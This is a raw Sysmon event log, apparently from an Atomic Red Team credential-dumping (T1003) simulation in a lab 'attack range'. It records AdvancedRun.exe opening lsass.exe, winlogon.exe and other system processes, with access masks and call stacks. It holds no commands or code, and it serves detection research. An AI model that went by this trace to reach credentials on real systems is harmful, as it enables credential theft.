17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967302Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967301Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967296Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967290Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967289Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967288Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967287Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003967285Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003967284Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967280Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003967279Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967278Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-2104-000000002702}108C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967277Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967276Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967275Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967274Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967273Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 